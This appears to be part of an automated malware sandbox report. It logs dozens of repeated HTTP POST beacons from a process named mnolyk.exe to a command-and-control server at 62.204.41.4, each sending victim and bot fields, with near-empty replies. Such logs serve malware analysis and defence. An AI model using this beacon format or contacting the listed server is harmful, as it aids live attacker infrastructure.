                                                                    Feb 8, 2023 21:33:29.513860941 CET650INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:29 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    451192.168.2.35015462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:29.685349941 CET651OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:29.751245975 CET651INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:29 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    452192.168.2.35015562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:29.921926022 CET652OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:29.986253977 CET652INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:29 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    453192.168.2.35015662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:30.159311056 CET653OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:30.225024939 CET653INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:30 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    454192.168.2.35015762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:30.407371998 CET654OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:30.471529961 CET654INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:30 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    455192.168.2.35015862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:30.648699045 CET655OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:30.713618994 CET655INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:30 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    456192.168.2.35015962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:31.057502031 CET656OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:31.123873949 CET656INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:31 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    457192.168.2.35016062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:31.348078012 CET657OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:31.412136078 CET657INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:31 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    458192.168.2.35016162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:31.638391018 CET658OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:31.701783895 CET658INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:31 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    459192.168.2.35016262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:32.538446903 CET659OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:32.603301048 CET659INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:32 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    46192.168.2.34974862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:28.171577930 CET247OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:28.236423016 CET247INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:28 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    460192.168.2.35016362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:32.883796930 CET660OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:32.951220036 CET660INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:32 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    461192.168.2.35016462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:34.164269924 CET661OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:34.236401081 CET661INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:34 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    462192.168.2.35016562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:34.424796104 CET662OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:34.491898060 CET662INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:34 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    463192.168.2.35016662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:34.675266981 CET663OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:34.738302946 CET663INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:34 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    464192.168.2.35016762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:34.906968117 CET664OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:34.971366882 CET664INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:34 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    465192.168.2.35016862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:35.170140028 CET665OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:35.236284018 CET665INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:35 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    466192.168.2.35016962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:35.407766104 CET666OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:35.471579075 CET666INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:35 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    467192.168.2.35017062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:35.646859884 CET667OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:35.710107088 CET667INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:35 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    468192.168.2.35017162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:35.892858028 CET668OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:35.958611012 CET668INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:35 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    469192.168.2.35017262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:36.146003008 CET669OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
